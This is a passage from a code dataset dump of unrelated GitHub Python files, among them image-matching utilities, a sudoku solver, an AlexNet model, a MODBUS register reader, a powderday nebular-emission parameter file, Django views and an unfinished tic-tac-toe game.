image1, scales0=None, scales1=None):\n device = image0.device\n data = {'image0': image0[None].cuda(), 'image1': image1[None].cuda()}\n img0, img1 = data['image0'], data['image1']\n feats0, feats1 = extractor({'image': img0}), extractor({'image': img1})\n pred = {**{k+'0': v for k, v in feats0.items()},\n **{k+'1': v for k, v in feats1.items()},\n **data}\n pred = {**pred, **matcher(pred)}\n pred = {k: v.to(device).detach()[0] if\n isinstance(v, torch.Tensor) else v for k, v in pred.items()}\n if scales0 is not None:\n pred['keypoints0'] = (pred['keypoints0'] + 0.5) / scales0[None] - 0.5\n if scales1 is not None:\n pred['keypoints1'] = (pred['keypoints1'] + 0.5) / scales1[None] - 0.5\n del feats0, feats1\n torch.cuda.empty_cache()\n\n # create match indices\n kpts0, kpts1 = pred['keypoints0'], pred['keypoints1']\n matches0, mscores0 = pred['matches0'], pred['matching_scores0']\n valid = matches0 > -1\n matches = torch.stack([torch.where(valid)[0], matches0[valid]], -1)\n # m_kpts0, m_kpts1 = pred['keypoints0'][matches[..., 0]], pred['keypoints1'][matches[..., 1]]\n return {**pred, 'matches': matches, 'matching_scores': mscores0[valid]}\n\ndef 
\n\ndef transformation(pt_drone, H):\n    return H @ pt_drone\n\ndef coords(mat):\n    a = mat[0][0]/mat[2][0]\n    b = mat[1][0]/mat[2][0]\n    return float(a), float(b)\n\ndef sigmoid(x):\n    return 1 / (1 + np.exp(-1 * x))\n\n# def ssim_similarity(imgA, imgB):\n#     return metrics.structural_similarity(imgA, imgB, channel_axis = 1)\n\ndef draw_matches(img_A, img_B, keypoints0, keypoints1):\n    \n    p1s = []\n    p2s = []\n    dmatches = []\n    for i, (x1, y1) in enumerate(keypoints0):\n\n        p1s.append(cv2.KeyPoint(x1, y1, 1))\n        p2s.append(cv2.KeyPoint(keypoints1[i][0], keypoints1[i][1], 1))\n        j = len(p1s) - 1\n        dmatches.append(cv2.DMatch(j, j, 1))\n\n    matched_images = cv2.drawMatches(cv2.cvtColor(img_A, cv2.COLOR_RGB2BGR), p1s,\n                                     cv2.cvtColor(img_B, cv2.COLOR_RGB2BGR), p2s, dmatches, None)\n\n    return matched_images\n\ndef rotate(image, angle, center=None, scale=1.0):  # rotate counterclockwise\n    (h, w) = image.shape[:2]\n    if center is None:\n        center = (w // 2, h // 2)\n    \n    M = cv2.getRotationMatrix2D(center, angle, scale)\n    \n    rotated = cv2.warpAffine(image, M, (w, h))\n    return rotated\n\ndef rotateP(angle, valuex, valuey, pointx, pointy):\n    valuex = np.array(valuex)\n    valuey = np.array(valuey)\n    sRotatex = (valuex-pointx)*math.cos(angle) + (valuey-pointy)*math.sin(angle) + pointx\n    sRotatey = (valuey-pointy)*math.cos(angle) - (valuex-pointx)*math.sin(angle) + pointy\n    return sRotatex, sRotatey\n\ndef getR(score):\n    x = score\n    R = 4\n    r = R * math.exp(-1 * math.pi * R**2 * x**2)\n    return math.ceil(r)\n\ndef byte2tensor(image):\n    decoded_image = cv2.imdecode(np.frombuffer(image, dtype=np.uint8),\n                                 cv2.IMREAD_COLOR)\n    return numpy_image_to_torch(decoded_image)","repo_name":"LuoXubo/UAV-tracking","sub_path":"lightglue/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"73090098473","text":"from src.machinelearningsuite.machinelearningsuite import MachineLearningSuite\n\n\nif __name__ == \"__main__\":\n    # suite = MachineLearningSuite(\"../videos/trump.mp4\", \"../data/shape_predictor_68_face_landmarks.dat\")\n    suite = MachineLearningSuite(\"webcam\", \"./data/shape_predictor_68_face_landmarks.dat\")\n    suite.initialize()\n\n    print(suite.configuration.to_dict())\n\n    while True:\n        print(\"MENU\")\n        print(\"=====\")\n        print(\"1. Create classes\")\n        print(\"2. Select the parts of the face to train on\")\n        print(\"3. Train\")\n        print(\"4. Predict\")\n        print(\"5. Reset configuration\")\n        print(\"6. 
Exit\")\n        choice = input(\"What do you want to do? \")\n\n        if choice == \"1\":\n            suite.create_classes()\n        elif choice == \"2\":\n            suite.select_parts()\n        elif choice == \"3\":\n            suite.train()\n        elif choice == \"4\":\n            suite.predict()\n        elif choice == \"5\":\n            suite.configuration.reset()\n        elif choice == \"6\":\n            suite.quit()\n        else:\n            print(\"Wrong choice\")\n            continue\n","repo_name":"bhanssens/student-trip-lyon","sub_path":"examples/machinelearningsuiteapp.py","file_name":"machinelearningsuiteapp.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"39144195869","text":"from Cell import *\nimport copy\nfrom oneCandidate import *\nfrom lockedCandidate import *\n\nclass Solver(object):\n    def __init__(self):\n        self._cells = []\n\n    def solve(self,array):\n        self._copyArray(array)\n        self._notSolvedArrayInit()\n        self.__oneCandidate = OneCandidate(array)\n        self.__lockedCandidate = LockedCandidate(array)\n        status = True\n        while status:\n            self._array, foundStatus1 = self.__oneCandidate.process(self._cells, self._array)\n            if self._cells: self._array, foundStatus2 = self.__lockedCandidate.process(self._cells, self._array)\n            else: break\n            \n            if not (foundStatus1 or foundStatus2): break\n\n        return self._array\n\n    def _copyArray(self,array):\n        if len(array) != 9:\n            raise ValueError('The matrix has too few rows!')\n        for i in range(len(array)):\n            if len(array[i]) != 9:\n                raise ValueError('The matrix has too few columns in row: ' + str(i))\n        \n        self._array = array\n\n    def _notSolvedArrayInit(self):\n        self._notSolvedIndex = []\n        for r in range(len(self._array)):\n            for c in range(len(self._array[r])):\n                if not self._array[r][c]:\n                    self._cells.append(Cell(r,c))\n\n    \n    \n    def __str__(self):\n        out = ''\n        for row in self._array:\n            out += str(row)+ '\\n'\n        return out","repo_name":"igorpieniek/tkinter_solver","sub_path":"sudoku_solver/Solver.py","file_name":"Solver.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"74662593833","text":"import tensorflow as tf\nimport numpy as np\n\nfrom layers import conv, lrn, max_pool, fc\n\n\nclass VS_CNN(object):\n\n    def __init__(self, num_classes, skip_layers=None, finetune_layers=None, weights_path='weights/bvlc_alexnet.npy'):\n        # TF placeholder for graph input and output\n        self.x = tf.placeholder(tf.float32, [None, 227, 227, 3])\n        self.y = tf.placeholder(tf.float32, [None, 2])\n        self.keep_prob = tf.placeholder(tf.float32)\n\n        self.num_classes = num_classes\n        self.skip_layers = skip_layers\n        self.finetune_layers = finetune_layers\n        self.weights_path = weights_path\n\n        # Call the build function to construct the computational graph of AlexNet\n        self.build()\n\n    def build(self):\n        \"\"\"Create the network graph.\"\"\"\n        # 1st Layer: Conv (w ReLu) -> Lrn -> Pool\n        conv1 = conv(self.x, 11, 11, 96, 4, 4, padding='VALID', name='conv1')\n        norm1 = lrn(conv1, 2, 1e-05, 0.75, name='norm1')\n        pool1 = max_pool(norm1, 3, 3, 2, 2, padding='VALID', name='pool1')\n\n        # 2nd Layer: Conv (w ReLu) -> Lrn -> Pool with 2 groups\n        conv2 = conv(pool1, 5, 5, 256, 1, 1, groups=2, name='conv2')\n        norm2 = lrn(conv2, 2, 1e-05, 0.75, name='norm2')\n        pool2 = max_pool(norm2, 3, 3, 2, 2, padding='VALID', name='pool2')\n\n        # 3rd Layer: Conv (w ReLu)\n        conv3 = conv(pool2, 3, 3, 384, 1, 1, name='conv3')\n\n        # 4th Layer: Conv (w ReLu) split into two groups\n        conv4 = conv(conv3, 3, 3, 384, 1, 1, groups=2, name='conv4')\n\n        # 5th Layer: Conv (w 
ReLu) -> Pool split into two groups\n        conv5 = conv(conv4, 3, 3, 256, 1, 1, groups=2, name='conv5')\n        pool5 = max_pool(conv5, 3, 3, 2, 2, padding='VALID', name='pool5')\n\n        # 6th Layer: Flatten -> FC (w ReLu) -> Dropout\n        flattened = tf.reshape(pool5, [-1, 6 * 6 * 256])\n        fc6 = fc(flattened, 6 * 6 * 256, 4096, name='fc6')\n\n        # 7th Layer: FC (w ReLu) -> Dropout\n        fc7 = fc(fc6, 4096, 4096, name='fc7')\n\n        # 8th Layer: FC and return unscaled activations\n        self.fc8 = fc(fc7, 4096, self.num_classes, relu=False, name='fc8')\n\n    def load_initial_weights(self, session):\n        weights_dict = dict(np.load(self.weights_path, encoding='bytes').item())\n\n        # Loop over all layer names stored in the weights dict\n        for op_name in weights_dict.keys():\n            # Check if layer should be trained from scratch\n            if op_name not in self.skip_layers:\n\n                trainable = False\n                if op_name in self.finetune_layers:\n                    trainable = True\n\n                with tf.variable_scope(op_name, reuse=True):\n                    # Assign weights/biases to their corresponding tf variable\n                    for data in weights_dict[op_name]:\n                        if len(data.shape) == 1:  # Biases\n                            var = tf.get_variable('biases', trainable=trainable)\n                            session.run(var.assign(data))\n                        else:  # Weights\n                            var = tf.get_variable('weights', trainable=trainable)\n                            session.run(var.assign(data))\n","repo_name":"PreferredAI/tutorials","sub_path":"image-classification/vs-cnn/src/model_base.py","file_name":"model_base.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"72"} {"seq_id":"26390583158","text":"import requests\n\ninverter_address = 'http://192.168.1.31:502'\n\ndef Send_request_to_device(address, request):\n    response = requests.post(address, request)\n    return response\n\n\n# Example request, reading 122 registers starting at address 40001\n# (the function below requests 2 registers instead):\n# Tx: 01 03 9C 40 00 7A EB AD\n# byte[0] = Unit id to send request to\n# byte[1] = The function to perform, 3 = read holding registers\n# byte[2:3] = The register address to start reading (40001)\n# byte[4:5] = The register amount / size of data\n# register 40000 will have least significant bytes\n# register 40001 will have most significant bytes\n\n# Rx: 01 03 9C 40 00 XX XX\n# byte[0] = Unit id to send request to\n# byte[1] = The function to perform, 3 = read holding registers\n# byte[2:3] = The register address to read (40001)\n# byte[4:7] = The register data\n# byte[4:5] = Least significant bytes\n# byte[6:7] = Most significant bytes\ndef Read_device_register(device_address):\n    read_register_request = bytes.fromhex('01 03 9C 40 00 02')\n    response = Send_request_to_device(device_address, read_register_request)\n    print(response)\n\n\nRead_device_register(inverter_address)
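\n\n# Worked example (illustrative only, not from the original file): decoding a\n# hypothetical response frame that returns two registers. Per the comments above,\n# the lower-addressed register holds the least significant word.\nexample_response = bytes.fromhex('01 03 04 00 2A 00 01')  # unit, function, byte count, 4 data bytes\nlow_word = int.from_bytes(example_response[3:5], 'big')   # first register = least significant word, 0x002A = 42\nhigh_word = int.from_bytes(example_response[5:7], 'big')  # second register = most significant word, 0x0001 = 1\nvalue_32bit = (high_word << 16) | low_word                # 65578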
","repo_name":"billyParmenter/MODBUS_Request","sub_path":"MODBUS_Request.py","file_name":"MODBUS_Request.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"3434758090","text":"class Solution:\n    def maxProfit(self, prices: List[int]) -> int:\n        # get max sell-off price from the future going backwards\n        # compute max last-transaction profits from this, running through backwards\n        # So far linear\n        # Then we can run forwards one last time keeping track of the past minimum and total profit\n        \n        profit = [0] * len(prices)\n        \n        max_future_price = prices[-1]\n        max_future_profit = 0\n        for i in range(len(prices)-2, -1, -1):\n            max_future_price = max(max_future_price, prices[i+1])\n            max_future_profit = max(max_future_profit, max_future_price - prices[i])\n            profit[i] = max_future_profit\n        \n        min_past_price = prices[0]\n        for i in range(len(prices)):\n            min_past_price = min(min_past_price, prices[i])\n            profit[i] += prices[i] - min_past_price\n\n        return max(profit)\n    \n    \n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_0123/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"27002418366","text":"from matplotlib import pyplot as plot\r\n\r\nprint(\"Data of the population of the top 5 countries of the world\")\r\nprint(\"\\nData taken from U.S. Census Bureau Current Population\")\r\nprint(\"\\nCreated for MLH daily task by a noob\")\r\n\r\n\r\nplot.xlabel('Countries')\r\nplot.ylabel('Population')\r\ncountries = ['China', 'India', 'USA', 'Indonesia', 'Pakistan']\r\npopu = [1394015977, 1325349639, 329877505, 272856400, 233431156]\r\nplot.bar(countries, popu, width = 0.7, color = ['green', 'red', 'blue', 'yellow', 'violet'])\r\nplot.title(\"POPULOUS COUNTRIES (July 1, 2020)\")\r\nplot.show()","repo_name":"pawanbgs0/MLH-local-hack-day","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"7471858979","text":"# coding=utf-8\n\n#-----------------------------------------------------------\n# Parameters that can be tuned for running CLOUDY models individually for each star particle. \n# There is an option to include nebular emission from young stars, post-AGB stars, Diffuse Ionized Gas and AGNs.\n# These only work when add_nebular_emission is set to true and use_cloudy_tables is set to false in parameters_master.py\n#-----------------------------------------------------------\n\n#===============================================\n# Sub Resolution Modeling \n#===============================================\nuse_cmdf = False             # If True, star particles that have mass greater than cmdf_max_mass (defined below) are broken down using a \n                             # cluster mass distribution function (cmdf) of the form dN/dM goes as M^(beta). This works irrespective of whether\n                             # nebular emission is turned on or not. The cmdf is set by the following parameters defined below: \n                             # cmdf_min_mass, cmdf_max_mass, cmdf_bins and cmdf_beta.\n\ncmdf_min_mass = 3.5          # Minimum mass of the star clusters in units of log(Msun). Note: Results might be inconsistent if\n                             # set lower than 3.5. (See Chandar et al. 2014 for more info) (Default = 3.5)\n\ncmdf_max_mass = 5.0          # Maximum mass of the star clusters in units of log(Msun). (Default = 5.0). Note: Only star particles that\n                             # have a mass greater than this parameter are broken down. \n\ncmdf_bins = 6                # The number of bins used for calculating the cluster mass distribution function (Default = 6)\n\ncmdf_beta = -2.0             # Beta (power law exponent) for calculating the CMDF (dN/dM goes as M^(beta)) \n\nuse_age_distribution = False # Setting this to True divides the star particles with ages between age_dist_min and age_dist_max (next parameters) into \n                             # an ensemble of particles all of whom have the same properties except their age, which is picked from a power law age \n                             # distribution of the form dN/dt proportional to t^-0.65 (Imp: This can only be used if use_cmdf is also set to True). \n                             # Note: The function has a bunch of tunable parameters that can be changed, though we feel that their default values\n                             # should be good enough for most cases. The function is located in the cloudy_tools.py file under powderday/nebular_emission. \n\nage_dist_min = 3e-3          # Star particles above this age are sub-divided into an age distribution if use_age_distribution is set to True\n                             # (Units: Gyr, Default = 3.e-3)\n\nage_dist_max = 1e-2          # Star particles below this age are sub-divided into an age distribution if use_age_distribution is set to True\n                             # (Units: Gyr, Default = 1.e-2)
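\n\n# Illustrative sketch (not a powderday setting): ages following dN/dt ~ t^-0.65\n# between age_dist_min and age_dist_max can be drawn by inverse-CDF sampling:\n#   u = numpy.random.random(n)\n#   a, b = age_dist_min**0.35, age_dist_max**0.35   # exponent 0.35 = 1 - 0.65\n#   ages = (a + u * (b - a)) ** (1 / 0.35)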
\n \n#***********************\n# COMMON PARAMETERS\n#***********************\n# NOTE: These parameters take either three or four values as an input. \n# They correspond to the value of the parameter for young stars, PAGB stars, AGN and DIG respectively.\n\nFORCE_gas_logu = [False, False, False]    # If set, then we force the ionization parameter (gas_logu) to be \n                                          # gas_logu (next parameter); else, it is taken to be variable and dependent on ionizing \n                                          # radiation from star particles. (Default: [False, False, False])\n\ngas_logu = [-2.0, -2.0, -2.0]             # Gas ionization parameter. This is only relevant \n                                          # if add_neb_emission is set to True and FORCE_gas_logu is set to True (Default: [-2.0, -2.0, -2.0])\n\ngas_logu_init = [0.0, 0.0, 0.0]           # Force the ionization parameter to increase/decrease by this value (Scale: log). \n                                          # Useful if you want to run tests (Default: [0.0, 0.0, 0.0])\n\nFORCE_gas_logz = [False, False, False]    # If set, then we force the metallicity (gas_logz) to be gas_logz (next parameter);\n                                          # else, it is taken to be the star particle's metallicity. (Default: [False, False, False])\n\ngas_logz = [0.0, 0.0, 0.0]                # Metallicity of the HII region in units of log(Z/Z_sun);\n                                          # only relevant if add_neb_emission = True and FORCE_gas_logz = True (Default: [0.0, 0.0, 0.0])\n\nFORCE_logq = [False, False, False]        # If set, then we force the number of ionizing photons to be source_logq (next parameter);\n                                          # else, it is taken to be variable and dependent on the ionizing radiation of the source. (Default: [False, False, False])\n\nsource_logq = [1.e47, 1.e47, 1.e47]       # The number of ionizing photons emitted by the source in units of s^-1. Only relevant if add_neb_emission = True, \n                                          # use_cloudy_tables = True and FORCE_logq = True (Default: [1.e47, 1.e47, 1.e47]) \n \nFORCE_inner_radius = [False, False, True] # If set, then we force the inner radius of the cloud to be inner_radius (next parameter). \n                                          # IMP Note: This works only for young stars and Post-AGB stars. \n                                          # For AGN we keep the inner radius fixed at whatever is set by inner_radius (next parameter) \n                                          # irrespective of what this parameter is set to. (Default: [False, False, True])\n\ninner_radius = [1.e19, 1.e19, 2.777e+20]  # This sets the inner radius of the cloud in cm. This is used only when add_neb_emission = True,\n                                          # use_cloudy_tables = False and FORCE_inner_radius = True (Default: [1.e19, 1.e19, 2.777e+20], Units = cm)
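\n\n# For orientation only (not a powderday setting): the quantities above are tied\n# together through the dimensionless ionization parameter,\n#   U = Q_H / (4 * pi * Rinner**2 * n_H * c).\n# E.g. Q_H = 1e47 s^-1, Rinner = 1e19 cm and n_H = 1e2 cm^-3 give\n#   U = 1e47 / (4 * pi * (1e19)**2 * 1e2 * 3e10) ~ 2.7e-5, i.e. log U ~ -4.6.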
\n\nFORCE_N_O_Pilyugin = [False, False, False, False] # If set to True, Nitrogen abundances are set according to the N/O vs O/H relation from Pilyugin et al. 2012.\n                                          # If FORCE_N_O_ratio (next parameter) is set to True then this parameter is ignored. (Default: [False, False, False, False])\n\nFORCE_N_O_ratio = [False, False, False, False] # If set, then we force the Nitrogen abundance such that the log of the N/O ratio is N_O_ratio (next parameter). \n                                          # This can be used as a template to fix the abundance ratio of other elements (Default: [False, False, False, False])\n\nN_O_ratio = [-0.85, -0.85, -0.85, -0.85]  # This sets the log of the N/O ratio. This is used only when add_neb_emission = True,\n                                          # use_cloudy_tables = False, FORCE_N_O_ratio = True and neb_abund = \"direct\" (Default: [-0.85, -0.85, -0.85, -0.85])\n\nneb_abund = [\"dopita\", \"dopita\", \"dopita\", \"dopita\"] # This sets the HII region elemental abundances for generating CLOUDY models. \n                                          # Available abundances are:\n                                          # dopita:    Abundances from Dopita (2001) with old solar abundances = 0.019 and ISM grains.\n                                          # newdopita: Abundances from Dopita (2013). Solar abundances from Grevesse 2010 - z = 0.013;\n                                          #            includes a smooth polynomial for the N/O, C/O relationship, a functional form for He(z),\n                                          #            new depletion, and factors in ISM grains.\n                                          # gutkin:    Abundances from Gutkin (2016) and PARSEC metallicity (Bressan+2012) based on Grevesse+Sauval (1998) \n                                          #            and Caffau+2011 \n                                          # direct:    Abundances are taken directly from the simulation if possible. Defaults to using \"dopita\" if there is \n                                          #            an error. (Note: Works only for AGNs and star particles that are added directly without binning.\n                                          #            Make sure to set FORCE_BINNED to False)\n                                          # This is used only when add_neb_emission = True and use_cloudy_tables = False. (Default: [\"dopita\", \"dopita\", \"dopita\", \"dopita\"])\n#***************************\n# YOUNG STARS (HII regions)\n#***************************\n\nadd_young_stars = True       # If set, the young stars are included when calculating nebular emission (Default: True)\n\n\nHII_Rinner_per_Rs = 0.01     # Rinner for CLOUDY calculations is set to this value times the Stromgren radius. \n                             # For example, if set to 0.01, Rinner is taken to be 1% of the Stromgren radius. \n                             # If FORCE_inner_radius (above) is set to True then this is overridden\n                             # and the value set by inner_radius is used. This parameter is used \n                             # only when add_neb_emission = True and use_cloudy_tables = False (Default: 0.01)\n \nHII_nh = 1.e2                # Gas hydrogen density for calculating nebular emission in units of cm^-3. \n                             # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 1.e2)\n\nHII_min_age = 1.e-3          # Sets the minimum age limit for calculating nebular emission in units of Gyr. \n                             # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 1.e-3)\n\nHII_max_age = 1.e-2          # Sets the maximum age limit for calculating nebular emission in units of Gyr. \n                             # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 1.e-2)\n\nHII_escape_fraction = 0.0    # Fraction of H-ionizing photons that escape the HII region. \n                             # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 0.0)
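\n\n# Worked example (illustrative only): for Q_H = 1e49 s^-1, n_H = 1e2 cm^-3 and a\n# case-B recombination coefficient alpha_B ~ 2.6e-13 cm^3 s^-1, the Stromgren radius is\n#   R_s = (3 * Q_H / (4 * pi * n_H**2 * alpha_B))**(1./3.) ~ 9.7e18 cm (~3 pc),\n# so HII_Rinner_per_Rs = 0.01 corresponds to Rinner ~ 9.7e16 cm.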
\n\nHII_dust = False             # If set, then dust grains are included in the CLOUDY model. We use the grains orion command to add\n                             # dust grains, which specifies graphitic and silicate grains with a size distribution and abundance\n                             # appropriate for those along the line of sight to the Trapezium stars in Orion (see the CLOUDY documentation,\n                             # Hazy 1, for more info). (Default: False)\n#****************\n# Post-AGB STARS\n#****************\n\nadd_pagb_stars = False       # If set, the Post-AGB stars are included when calculating nebular emission.\n                             # This works only when add_neb_emission = True and use_cloudy_tables = False (Default: False)\n\nPAGB_N_enhancement = 0.4     # Enhances the Nitrogen abundance of Post-AGB stars by increasing the log(N/O) by this value. \n                             # This is used only when add_neb_emission = True, use_cloudy_tables = False and add_pagb_stars = True (Default = 0.4) \n\nPAGB_C_enhancement = 0.4     # Enhances the Carbon abundance of Post-AGB stars by increasing the log(C/O) by this value.\n                             # This is used only when add_neb_emission = True, use_cloudy_tables = False and add_pagb_stars = True (Default = 0.4)\n\nPAGB_Rinner_per_Rs = 0.01    # Rinner for CLOUDY calculations is set to this value times the Stromgren radius. \n                             # For example, if set to 0.01, Rinner is taken to be 1% of the Stromgren radius. \n                             # If FORCE_inner_radius (above) is set to True then this is overridden\n                             # and the value set by inner_radius is used. This parameter is used \n                             # only when add_neb_emission = True and use_cloudy_tables = False (Default: 0.01)\n\nPAGB_nh = 1.e2               # Gas hydrogen density for calculating nebular emission in units of cm^-3. \n                             # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 1.e2)\n\nPAGB_min_age = 0.1           # Sets the minimum age limit for calculating nebular emission from post-AGB stars, in units of Gyr.\n                             # This is used only when add_neb_emission = True, use_cloudy_tables = False and add_pagb_stars = True (Default = 0.1)\n\nPAGB_max_age = 10            # Sets the maximum age limit for calculating nebular emission from post-AGB stars, in units of Gyr.\n                             # This is used only when add_neb_emission = True, use_cloudy_tables = False and add_pagb_stars = True (Default = 10)\n\nPAGB_escape_fraction = 0.0   # Fraction of H-ionizing photons that escape the HII region. \n                             # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 0.0)\n\n#**************\n# AGN\n#**************\n\nadd_AGN_neb = False          # If set, AGNs are included when calculating nebular emission.\n                             # This works only when add_neb_emission = True and use_cloudy_tables = False (Default: False)\n\nAGN_nh = 1.e3                # Gas hydrogen density for calculating nebular emission in units of cm^-3. \n                             # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 1.e3)\n\nAGN_num_gas = 32             # For CLOUDY calculations we use the distance weighted average metallicity of gas particles around the AGN. \n                             # The number of gas particles used for doing so is set by this parameter. (Default: 32)\n\n#**********************\n# Diffuse Ionized Gas (DIG)\n#**********************\n\nadd_DIG_neb = False          # If set, the contribution from DIG is included when calculating nebular emission. \n                             # This works only when add_neb_emission = True and use_cloudy_tables = False (Default: False)\n\nDIG_nh = 1.e1                # Gas hydrogen density for calculating nebular emission in units of cm^-3. 
(Default: 10)\n \n\nDIG_min_logU = -6.0          # Only gas cells with an ionization parameter greater than this are considered for the DIG calculation. \n                             # This is done so as to speed up the calculation by ignoring the cells that do not have enough energy \n                             # to produce any substantial emission. (Default: -6.0)\n\nuse_black_sed = False        # If set, the Black et al. (1987) ISRF is used as the input SED shape for DIG CLOUDY calculations;\n                             # else, the input SED shape is calculated by taking a distance weighted average of the CLOUDY \n                             # output spectrum of nearby stars. The normalization of the SED is set by the total energy \n                             # above the Lyman limit dumped in each cell. (Default: False)\n\nstars_max_dist = 1           # Only stars within this distance are considered for getting the input spectrum shape. (Units: kpc)\n                             # This is used only when use_black_sed = False (Default = 1)\n\nmax_stars_num = 20           # This sets the upper limit on the number of stars that are used for calculating the input spectrum shape.\n                             # This is used only when use_black_sed = False (Default = 20)\n#*************************\n# DEBUGGING AND CLEAN UP\n#*************************\n\ndump_emlines = False         # If True, the emission lines are saved in a file before going through the dust radiative transfer. \n                             # These are the CLOUDY computed emission line strengths, and are calculated for all lines\n                             # CLOUDY calculates (i.e. not just those undergoing radiative transfer). The format for the output \n                             # is a wavelength array, followed by a (nlam+2) list for each nebular emission bearing particle. \n                             # The +2 in the (nlam+2) list are the O/H ratio and the id of that particle, with id = 0, 1, 2 and 3 \n                             # corresponding to young stars, PAGB stars, AGN and DIG respectively. There is a convenience package in \n                             # /convenience to help read in this file. This can be used as a fast way of getting emission lines for the \n                             # purpose of debugging the code. Naming convention: emlines.galaxy*.txt where * is the galaxy number. \n                             # This works only when add_neb_emission = True (Default: False) \n\ncloudy_cleanup = True        # If set to True, all the CLOUDY files will be deleted after the source addition is complete. \n                             # Only relevant if add_neb_emission = True and use_cloudy_tables = False (Default: True)\n\n#===============================================\n# DEBUGGING - THE PERFORMANCE OF THE CODE USING THESE PARAMETERS IS NOT GUARANTEED\n#===============================================\nNEB_DEBUG = False            # Dumps parameters related to nebular line emission in a file for debugging.\n                             # The file includes the ionization parameter, number of ionizing photons, \n                             # metallicity, inner radius, stellar mass and age for each particle.\n                             # Naming convention: nebular_properties_galaxy*.txt where * is the galaxy number\n\nSAVE_NEB_SEDS = False        # If set, the CLOUDY output SEDs are saved in a file \n","repo_name":"dnarayanan/powderday","sub_path":"parameters_master_neb.py","file_name":"parameters_master_neb.py","file_ext":"py","file_size_in_byte":18293,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} {"seq_id":"28365110406","text":"# Task 2. Create a dictionary of abbreviations commonly used in newspapers or online articles. 
Use the abbreviation of a word as the key;\n# the value is the expansion of that abbreviation.\n\n# empty dictionary of abbreviations\nskroty = {}\n\n# add key-value pairs to the dictionary\nskroty['al.'] = 'aleja'\nskroty['cd.'] = 'ciąg dalszy'\nskroty['dr'] = 'doktor'\nskroty['itd.'] = 'i tak dalej'\nskroty['itp.'] = 'i tym podobne'\n\n# display all entries of the dictionary\nprint(\"Contents of the 'skroty' dictionary:\")\nfor key in skroty.keys():\n    print(f\"{key} - {skroty[key]}\")\n","repo_name":"UWMKacper/WizualizacjaDanych","sub_path":"Praca_domowa/Lab2/Zad2.py","file_name":"Zad2.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"15491163147","text":"from .serialization import snipetSerializer\nfrom rest_framework.parsers import JSONParser\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom .models import snipet\n# Create your views here.\n\n\n# @api_view(['GET', 'POST', 'PUT'])\n@csrf_exempt\ndef home(req):\n\n    if req.method == 'GET':\n        snip = snipet.objects.all()\n        se = snipetSerializer(snip, many=True)\n        return Response(se.data, content_type='application/xml')\n\n    elif req.method == 'POST':\n        data = JSONParser().parse(req)\n        se = snipetSerializer(data=data)\n\n        if se.is_valid():\n            se.save()\n            return Response(se.data, content_type='application/xml')\n        return Response(se.errors)\n    return Response('hello', content_type='application/xml')\n\n\n@csrf_exempt\ndef all(req, pk):\n\n    try:\n        mo = snipet.objects.get(pk=pk)\n    except snipet.DoesNotExist:\n        return Response(status=404)\n\n    if req.method == 'GET':\n        se = snipetSerializer(mo)\n        return Response(se.data)\n\n    if req.method == 'PUT':\n        data = JSONParser().parse(req)\n        se = snipetSerializer(mo, data=data)\n        if se.is_valid():\n            se.save()\n            return Response(se.data)\n        return Response(se.errors)\n","repo_name":"ibar2/studing-django-projects","sub_path":"serialization/req/se/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"72965179432","text":"board = [\"-\",\"-\",\"-\",\r\n         \"-\",\"-\",\"-\",\r\n         \"-\",\"-\",\"-\",]\r\n\r\ngame_on = True \r\n\r\nwinner = None\r\n\r\ncurrent_player = input(\"Choose X or O: \").upper()\r\n\r\n\r\ndef display_board():\r\n    print( board[0] + \" | \" + board[1] + \" | \" + board[2])\r\n    print(\"__|___|__\")\r\n    print( board[3] + \" | \" + board[4] + \" | \" + board[5])\r\n    print(\"__|___|__\")\r\n    print( board[6] + \" | \" + board[7] + \" | \" + board[8]) \r\n    print(\"  |   |  \")\r\n\r\ndef play_game():\r\n\r\n    display_board()\r\n\r\n    while game_on: \r\n        \r\n        handle_turn(current_player)\r\n\r\n        check_gameover()  # this function calls two functions, [check_if_win] and [check_if_draw]; I handle the draw message inside check_if_draw below\r\n\r\n        flip_player()\r\n\r\n    if winner == \"X\" or winner == \"O\":\r\n        print(winner + \" is the winner.\")\r\n    # elif winner == None: inside the while loop this condition would be checked every time\r\n    #     print(\"It's a draw.\") \r\n    \r\ndef handle_turn(player):\r\n\r\n    print(player + \"'s turn.\")\r\n    position = input(\"choose a number from 1-9: \")\r\n\r\n    valid = False\r\n    while not valid:\r\n\r\n        while position not in [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]:\r\n            position = input(\"invalid input, choose from 1-9: \")\r\n\r\n        position = int(position) - 1 \r\n\r\n        
